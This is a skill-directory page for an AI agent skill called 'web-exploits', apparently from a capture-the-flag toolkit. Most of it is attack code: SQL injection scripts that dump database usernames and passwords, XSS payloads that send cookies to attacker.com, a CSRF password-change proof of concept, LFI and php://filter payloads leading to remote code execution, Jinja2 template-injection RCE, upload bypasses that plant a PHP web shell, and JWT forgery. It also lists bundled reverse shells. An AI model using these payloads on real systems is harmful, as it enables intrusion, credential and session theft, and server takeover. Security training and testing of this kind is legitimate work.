web-exploits

Web Exploitation Patterns

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "web-exploits" with this command: npx skills add g36maid/ctf-arsenal/g36maid-ctf-arsenal-web-exploits

Web Exploitation Patterns

When to Use

Load this skill when:

  • Testing web applications for vulnerabilities

  • Exploiting SQL injection, XSS, or CSRF

  • Bypassing file upload restrictions

  • Testing for LFI/RFI (Local/Remote File Inclusion)

  • Exploiting SSTI (Server-Side Template Injection)

  • Manipulating JWT tokens

  • Analyzing web traffic with Burp Suite

SQL Injection

Detection and Exploitation

import requests

Test for SQL injection

payloads = [ "'", "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1' /*", "admin' --", "admin' #", "' UNION SELECT NULL--", ]

for payload in payloads: response = requests.post(url, data={'username': payload, 'password': 'test'}) if "error" in response.text or "mysql" in response.text.lower(): print(f"[!] Vulnerable to: {payload}")

Union-Based SQLi

Step 1: Find number of columns

for i in range(1, 20): payload = f"' UNION SELECT {','.join(['NULL']*i)}--" response = requests.get(f"{url}?id={payload}") if "error" not in response.text: print(f"[+] Number of columns: {i}") break

Step 2: Extract data

payloads = [ "' UNION SELECT 1,version(),3--", "' UNION SELECT 1,database(),3--", "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--", "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--", "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--", ]

Blind SQLi

Time-based blind SQLi

import time

def time_based_sqli(url, param): """Check if parameter is vulnerable to time-based SQLi""" payload = f"' AND SLEEP(5)--" start = time.time() response = requests.get(f"{url}?{param}={payload}") elapsed = time.time() - start

if elapsed >= 5:
    print(f"[+] Time-based SQLi confirmed on {param}")
    return True
return False

Boolean-based blind SQLi

def boolean_based_sqli(url): """Extract data character by character""" result = "" for i in range(1, 100): # Max 100 characters for c in range(32, 127): # ASCII printable payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--" response = requests.get(f"{url}?id={payload}") if "Welcome" in response.text: # Success indicator result += chr(c) print(f"[+] Found: {result}") break else: break return result

Cross-Site Scripting (XSS)

Reflected XSS

// Basic payloads <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <iframe src="javascript:alert(1)">

// Bypass filters <scr<script>ipt>alert(1)</scr</script>ipt> <img src=x onerror="alert(String.fromCharCode(88,83,83))"> <svg/onload=alert(1)>

// Extract cookies <script>fetch('http://attacker.com/?c='+document.cookie)&#x3C;/script> <img src=x onerror="location='http://attacker.com/?c='+document.cookie">

Stored XSS

import requests

Test stored XSS

xss_payloads = [ "<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>", '"><script>alert(1)</script>', "';alert(1);//", ]

for payload in xss_payloads: # Submit payload requests.post(url + "/comment", data={'text': payload})

# Check if executed
response = requests.get(url + "/comments")
if payload in response.text:
    print(f"[+] Stored XSS: {payload}")

CSRF (Cross-Site Request Forgery)

<!-- CSRF PoC for form submission --> <html> <body> <form action="https://target.com/change_password" method="POST"> <input type="hidden" name="new_password" value="hacked123" /> <input type="hidden" name="confirm_password" value="hacked123" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Test CSRF protection

import requests

session = requests.Session()

Login first

session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'})

Try action without token

response = session.post(url + "/delete_user", data={'id': '1'})

if response.status_code == 200: print("[!] No CSRF protection!")

Local File Inclusion (LFI)

Path Traversal

Common LFI payloads

lfi_payloads = [ "../../../../../etc/passwd", "....//....//....//....//etc/passwd", "..%2F..%2F..%2F..%2Fetc%2Fpasswd", "..../..../..../..../etc/passwd", "/etc/passwd", "php://filter/convert.base64-encode/resource=index.php", "expect://whoami", "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7", ]

for payload in lfi_payloads: response = requests.get(f"{url}?page={payload}") if "root:" in response.text or "<?php" in response.text: print(f"[+] LFI found: {payload}")

PHP Filter Chain (RCE)

Use php://filter to achieve RCE

filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|" filter_chain += "convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|"

... (full chain truncated for brevity)

filter_chain += "resource=data://,<?php system($_GET['cmd']); ?>"

response = requests.get(f"{url}?page={filter_chain}&cmd=whoami")

Server-Side Template Injection (SSTI)

Detection

Test payloads for common template engines

ssti_tests = { 'Jinja2': "{{77}}", # Python (Flask) 'Twig': "{{77}}", # PHP 'ERB': "<%= 77 %>", # Ruby 'Smarty': "{77}", # PHP 'Velocity': "#set($x=7*7)$x", # Java }

for engine, payload in ssti_tests.items(): response = requests.get(f"{url}?name={payload}") if "49" in response.text: print(f"[+] {engine} SSTI detected!")

Jinja2 Exploitation

Read file

payload = "{{ ''.class.mro[1].subclasses()40.read() }}"

RCE (Python 2)

payload = "{{ ''.class.mro[2].subclasses()40.write('#!/bin/bash\nid') }}"

RCE (Python 3)

payload = "{{ self.init.globals.builtins.import('os').popen('id').read() }}"

File Upload Bypass

Extension Bypass

Test various extensions

extensions = [ 'php', 'php3', 'php4', 'php5', 'phtml', 'pht', 'php.jpg', 'php.png', 'php;.jpg', 'php%00.jpg', # Null byte injection ]

for ext in extensions: filename = f"shell.{ext}" files = {'file': (filename, "<?php system($_GET['cmd']); ?>", 'application/x-php')} response = requests.post(url + "/upload", files=files)

if response.status_code == 200:
    print(f"[+] Uploaded: {filename}")

Content-Type Bypass

Try different MIME types

content_types = [ 'image/jpeg', 'image/png', 'image/gif', 'application/octet-stream', ]

for ctype in content_types: files = {'file': ('shell.php', "<?php system($_GET['cmd']); ?>", ctype)} response = requests.post(url + "/upload", files=files)

Magic Bytes Bypass

Add GIF header to bypass file type checks

content = b"GIF89a" + b"<?php system($_GET['cmd']); ?>" files = {'file': ('shell.php', content, 'image/gif')} response = requests.post(url + "/upload", files=files)

JWT Token Manipulation

import jwt import base64

Decode JWT

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..." decoded = jwt.decode(token, options={"verify_signature": False}) print(decoded)

None algorithm attack

header = base64.b64encode(b'{"typ":"JWT","alg":"none"}').strip(b'=') payload = base64.b64encode(b'{"user":"admin"}').strip(b'=') forged_token = header + b'.' + payload + b'.'

Weak secret bruteforce

import hashlib with open('wordlists/common.txt') as f: for secret in f: secret = secret.strip() try: jwt.decode(token, secret, algorithms=['HS256']) print(f"[+] Found secret: {secret}") break except: continue

Quick Reference

Vulnerability Detection Pattern Exploitation

SQL Injection ' , ' OR 1=1--

' UNION SELECT ...

XSS <script>alert(1)</script>

Cookie stealing, session hijacking

LFI ../../../etc/passwd

Read sensitive files, RCE via log poisoning

SSTI {{77}} , ${77}

RCE via template engine

File Upload Upload .php , .phtml

Web shell execution

CSRF No token validation Force user actions

JWT alg: none , weak secret Privilege escalation

Bundled Resources

Scripts

  • scripts/csrf_grabber.py

  • Extract CSRF tokens automatically

  • scripts/jwt_tamper.py

  • JWT token manipulation tool

  • scripts/lfi_tester.py

  • Automated LFI testing

  • scripts/ssti_tester.py

  • SSTI detection and exploitation

  • scripts/upload_tester.py

  • File upload bypass testing

Payloads

  • payloads/sqli_basic.txt

  • Basic SQL injection payloads

  • payloads/sqli_mysql.txt

  • MySQL-specific payloads

  • payloads/xss_reflected.txt

  • XSS test vectors

  • payloads/ssti_jinja2.txt

  • Jinja2 SSTI payloads

  • payloads/cmd_injection.txt

  • Command injection patterns

  • payloads/lfi.txt

  • LFI/path traversal payloads

  • payloads/ssrf.txt

  • SSRF test URLs

  • payloads/file_upload_bypass.txt

  • Extension bypass techniques

Webshells

  • webshells/php_reverse.php

  • PHP reverse shell

  • webshells/aspx_cmd.aspx

  • ASPX command shell

  • webshells/jsp_cmd.jsp

  • JSP command shell

  • webshells/node_cmd.js

  • Node.js shell

Templates

  • templates/web_requests.py
  • Python requests template with session handling

Wordlists

  • wordlists/
  • Common username/password lists (from SecLists)

Keywords

web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open in GitHubOpen in ClawHub

Related Skills

Related by shared tags or category signals.

General

forensics-tools

No summary provided by upstream source.

Repository SourceNeeds Review
11-g36maid
General

pwn-exploits

No summary provided by upstream source.

Repository SourceNeeds Review
10-g36maid
General

ics-traffic

No summary provided by upstream source.

Repository SourceNeeds Review
10-g36maid
General

misc-tools

No summary provided by upstream source.

Repository SourceNeeds Review
9-g36maid